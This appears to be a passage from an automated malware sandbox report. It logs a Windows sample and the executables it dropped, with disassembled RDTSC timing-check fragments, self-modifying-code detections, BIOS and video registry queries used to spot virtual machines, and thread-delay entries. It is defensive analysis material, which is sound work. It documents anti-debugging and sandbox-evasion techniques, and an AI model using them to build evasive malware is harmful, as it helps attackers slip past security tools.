Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0315 second address: 50B03CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c call 00007F0E6551CA3Dh 0x00000011 jmp 00007F0E6551CA40h 0x00000016 pop esi 0x00000017 push edx 0x00000018 mov di, cx 0x0000001b pop eax 0x0000001c popad 0x0000001d or edx, dword ptr [ebp+0Ch] 0x00000020 pushad 0x00000021 mov cx, di 0x00000024 push ebx 0x00000025 pop ecx 0x00000026 popad 0x00000027 test edx, 61000000h 0x0000002d jmp 00007F0E6551CA49h 0x00000032 jne 00007F0ED739AD50h 0x00000038 jmp 00007F0E6551CA3Eh 0x0000003d test byte ptr [esi+48h], 00000001h 0x00000041 pushad 0x00000042 mov si, C57Dh 0x00000046 pushfd 0x00000047 jmp 00007F0E6551CA3Ah 0x0000004c jmp 00007F0E6551CA45h 0x00000051 popfd 0x00000052 popad 0x00000053 jne 00007F0ED739AD2Ah 0x00000059 jmp 00007F0E6551CA3Eh 0x0000005e test bl, 00000007h 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B03CA second address: 50B03E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B03E7 second address: 50B03F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B03F7 second address: 50B03FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0814 second address: 50A083B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E6551CA43h 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edx, 3E36A082h 0x00000016 mov eax, edx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A083B second address: 50A0864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E647B607Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0864 second address: 50A0890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 jmp 00007F0E6551CA3Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F0E6551CA3Eh 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0890 second address: 50A0894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0894 second address: 50A08B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A08B1 second address: 50A0906 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f push eax 0x00000010 mov dx, AB5Ah 0x00000014 pop edi 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 jmp 00007F0E647B607Eh 0x0000001c push eax 0x0000001d jmp 00007F0E647B607Bh 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0E647B6085h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0906 second address: 50A090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A090C second address: 50A0910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0910 second address: 50A098B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F0E6551CA46h 0x00000011 push eax 0x00000012 pushad 0x00000013 movsx edx, cx 0x00000016 pushad 0x00000017 movzx eax, di 0x0000001a jmp 00007F0E6551CA45h 0x0000001f popad 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 jmp 00007F0E6551CA3Eh 0x00000027 mov esi, dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0E6551CA47h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A098B second address: 50A0A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, 00000000h 0x0000000f jmp 00007F0E647B607Eh 0x00000014 test esi, esi 0x00000016 jmp 00007F0E647B6080h 0x0000001b je 00007F0ED663BA4Ah 0x00000021 pushad 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 push ebx 0x00000025 pushfd 0x00000026 jmp 00007F0E647B6084h 0x0000002b jmp 00007F0E647B6085h 0x00000030 popfd 0x00000031 pop esi 0x00000032 popad 0x00000033 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov dl, ah 0x0000003f mov esi, ebx 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0A00 second address: 50A0A63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E6551CA3Ch 0x00000009 add si, A7C8h 0x0000000e jmp 00007F0E6551CA3Bh 0x00000013 popfd 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ecx, esi 0x0000001c jmp 00007F0E6551CA3Bh 0x00000021 je 00007F0ED73A23A5h 0x00000027 pushad 0x00000028 push esi 0x00000029 mov bh, F0h 0x0000002b pop esi 0x0000002c mov esi, ebx 0x0000002e popad 0x0000002f test byte ptr [76FB6968h], 00000002h 0x00000036 pushad 0x00000037 jmp 00007F0E6551CA45h 0x0000003c push eax 0x0000003d push edx 0x0000003e mov edi, eax 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0A63 second address: 50A0AA1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0E647B607Ah 0x00000008 adc ax, F7B8h 0x0000000d jmp 00007F0E647B607Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 jne 00007F0ED663B9A8h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F0E647B6085h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0AA1 second address: 50A0AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0AB5 second address: 50A0AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0AB9 second address: 50A0ABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0ABF second address: 50A0ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0ADC second address: 50A0B10 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 0FA105FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, ecx 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F0E6551CA3Fh 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E6551CA45h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0B10 second address: 50A0B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E647B6087h 0x00000009 sub eax, 303046FEh 0x0000000f jmp 00007F0E647B6089h 0x00000014 popfd 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0B57 second address: 50A0B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0B5B second address: 50A0B61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0B61 second address: 50A0BC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E6551CA3Ch 0x00000009 sub eax, 66027D28h 0x0000000f jmp 00007F0E6551CA3Bh 0x00000014 popfd 0x00000015 call 00007F0E6551CA48h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f jmp 00007F0E6551CA40h 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 pushad 0x00000027 movzx esi, dx 0x0000002a mov si, bx 0x0000002d popad 0x0000002e popad 0x0000002f push dword ptr [ebp+14h] 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0BC3 second address: 50A0BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0BC7 second address: 50A0BDF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [ebp+10h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E6551CA3Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C07 second address: 50A0C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C0D second address: 50A0C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C13 second address: 50A0C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E647B607Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C29 second address: 50A0C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C2F second address: 50A0C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C33 second address: 50A0C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a mov si, bx 0x0000000d pushad 0x0000000e movsx ebx, si 0x00000011 mov di, ax 0x00000014 popad 0x00000015 popad 0x00000016 mov esp, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F0E6551CA48h 0x0000001f xor esi, 4DC90E98h 0x00000025 jmp 00007F0E6551CA3Bh 0x0000002a popfd 0x0000002b pushad 0x0000002c push ecx 0x0000002d pop edx 0x0000002e movzx ecx, bx 0x00000031 popad 0x00000032 popad 0x00000033 pop ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C86 second address: 50A0C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C8A second address: 50A0C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0A77 second address: 50B0B1A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0E647B6080h 0x00000008 sub ecx, 22AABF38h 0x0000000e jmp 00007F0E647B607Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F0E647B6088h 0x0000001c and eax, 77363998h 0x00000022 jmp 00007F0E647B607Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F0E647B607Bh 0x00000034 jmp 00007F0E647B6083h 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007F0E647B6088h 0x00000040 and ax, 3E58h 0x00000045 jmp 00007F0E647B607Bh 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0B1A second address: 50B0B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0B20 second address: 50B0B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0B24 second address: 50B0B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120E6B second address: 5120E6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120E6F second address: 5120E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120E75 second address: 5120ED1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dl, cl 0x0000000d movsx edx, ax 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F0E647B6085h 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 jmp 00007F0E647B607Ch 0x0000001e mov ch, 7Dh 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0E647B607Fh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120ED1 second address: 5120ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120ED5 second address: 5120EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51203AE second address: 51203B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51203B2 second address: 51203B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51203B8 second address: 51203D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov bx, si 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51203D4 second address: 51203EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B6082h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51203EA second address: 51203EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120642 second address: 5120648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120648 second address: 512064E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 512064E second address: 5120652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120652 second address: 5120699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e pushfd 0x0000000f jmp 00007F0E6551CA3Ch 0x00000014 and ch, FFFFFFF8h 0x00000017 jmp 00007F0E6551CA3Bh 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 movsx edx, si 0x00000023 mov di, cx 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F0E6551CA3Ah 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120699 second address: 512069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 512069D second address: 51206BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51206BA second address: 51206CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B607Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51206CA second address: 51206CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A70FFD second address: A71003 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8BEE34 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A65351 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A63DCC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A639E1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AF1440 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A0EE34 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: BB5351 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: BB3DCC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: BB39E1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: C41440 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Special instruction interceptor: First address: FC7CAA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Special instruction interceptor: First address: FC7DAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Special instruction interceptor: First address: 115D7FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Special instruction interceptor: First address: 11F2DF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Special instruction interceptor: First address: CA5A37 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Special instruction interceptor: First address: E4979B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Special instruction interceptor: First address: CA367E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Special instruction interceptor: First address: CA59DA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Special instruction interceptor: First address: FCFB8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Special instruction interceptor: First address: FCFC8F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Special instruction interceptor: First address: FCD566 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Special instruction interceptor: First address: 115FE1D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Special instruction interceptor: First address: 1168FA0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Special instruction interceptor: First address: 11F49A7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Special instruction interceptor: First address: 81C9EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Special instruction interceptor: First address: 9BEF79 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Special instruction interceptor: First address: 81A576 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Special instruction interceptor: First address: F1798D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Special instruction interceptor: First address: 10DEC68 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Special instruction interceptor: First address: 10C0DA8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Special instruction interceptor: First address: 11455D7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Special instruction interceptor: First address: 5AFC4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Special instruction interceptor: First address: 5AD642 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Special instruction interceptor: First address: 788AE3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Special instruction interceptor: First address: 7EFFD9 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05120D04 rdtsc

0_2_05120D04

Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Thread delayed: delay time: 180000

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1349	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1251	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1253	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1238	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Window / User API: threadDelayed 9736
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window / User API: threadDelayed 1223
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window / User API: threadDelayed 1231
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window / User API: threadDelayed 1167
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window / User API: threadDelayed 1426
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Window / User API: threadDelayed 1197
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window / User API: threadDelayed 1194
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window / User API: threadDelayed 1206
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window / User API: threadDelayed 1204
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window / User API: threadDelayed 1224
